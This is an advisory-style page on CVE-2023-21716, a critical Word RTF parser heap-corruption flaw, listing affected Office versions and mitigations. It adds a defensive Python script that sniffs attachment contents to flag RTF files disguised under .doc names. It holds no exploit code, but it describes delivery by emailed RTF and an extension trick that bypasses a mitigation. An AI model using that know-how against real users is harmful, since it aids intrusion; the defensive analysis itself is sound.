CVE-2023-21716 (Microsoft Word RCE)
CNA: Microsoft Corporation (more like telemetry corporation)
Base Score: 9.8 CRITICAL
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
It is a heap corruption vulnerability in Microsoft Word's RTF parser that, if triggered, allows attackers to achieve remote code execution with the privileges of the victim.
The flaw does not require prior authentication: attackers can simply send a booby-trapped RTF file to the victim(s) via email.
Microsoft Office 365 (Insider Preview - 2211 Build 15831.20122 CTR)
Microsoft Office 2016 (Including Insider Slow - 1704 Build 8067.2032 CTR)
Microsoft Office 2013
Microsoft Office 2010
Microsoft Office 2007
Older versions may also be affected but were not tested. Furthermore, the technical details of this vulnerability have evolved over the years.
Microsoft Office 2010 and later use Protected View to limit damage caused by malicious documents procured from untrusted sources. Protected View is in effect when this vulnerability manifests and thus an additional sandbox escape vulnerability would be required to gain full privileges.
Removing the file association for the RTF extension is ineffective because using a DOC extension will still reach the vulnerable code.
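Because the extension does not decide which parser runs, a mail or file gateway has to classify attachments by content. The following is an added example, not part of the original page: the function names (`sniff_format`, `disguised_rtf`, `triage`) and the sample attachments are constructed for illustration, and the loose `{\rt` prefix match is an assumption chosen to err towards flagging.

```python
# Added example: classify Office attachments by content, not by file name.
from pathlib import PurePath

OLE2_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")  # legacy .doc container
ZIP_MAGIC = b"PK\x03\x04"                        # .docx (OOXML) container
UTF8_BOM = b"\xef\xbb\xbf"


def sniff_format(data: bytes) -> str:
    """Return 'rtf', 'ole2', 'zip' or 'unknown' from the leading bytes."""
    head = data[:64]
    if head.startswith(UTF8_BOM):
        head = head[len(UTF8_BOM):]
    head = head.lstrip(b" \t\r\n")
    # Assumption: match the short prefix "{\rt" rather than "{\rtf1", so that
    # slightly malformed headers are flagged instead of passed.
    if head.lower().startswith(b"{\\rt"):
        return "rtf"
    if data.startswith(OLE2_MAGIC):
        return "ole2"
    if data.startswith(ZIP_MAGIC):
        return "zip"
    return "unknown"


def disguised_rtf(filename: str, data: bytes) -> bool:
    """True when the content is RTF but the extension claims otherwise."""
    ext = PurePath(filename).suffix.lower()
    return sniff_format(data) == "rtf" and ext != ".rtf"


def triage(attachments):
    """Yield (filename, detected_format, disguised) for each (name, bytes) pair."""
    for name, data in attachments:
        yield name, sniff_format(data), disguised_rtf(name, data)


# Constructed sample attachments (benign placeholder bodies).
SAMPLES = [
    ("invoice.rtf", b"{\\rtf1\\ansi Hello}"),
    ("report.doc", b"\r\n{\\rtf1\\ansi Hello}"),   # RTF content, DOC name
    ("legacy.doc", OLE2_MAGIC + b"\x00" * 16),     # genuine OLE2 container
    ("notes.docx", ZIP_MAGIC + b"\x00" * 16),
]

if __name__ == "__main__":
    for row in triage(SAMPLES):
        print(row)
```

A gateway policy built on this would route anything where `sniff_format` returns `rtf` to the same handling regardless of its name, and treat a `disguised_rtf` hit as an additional signal worth logging.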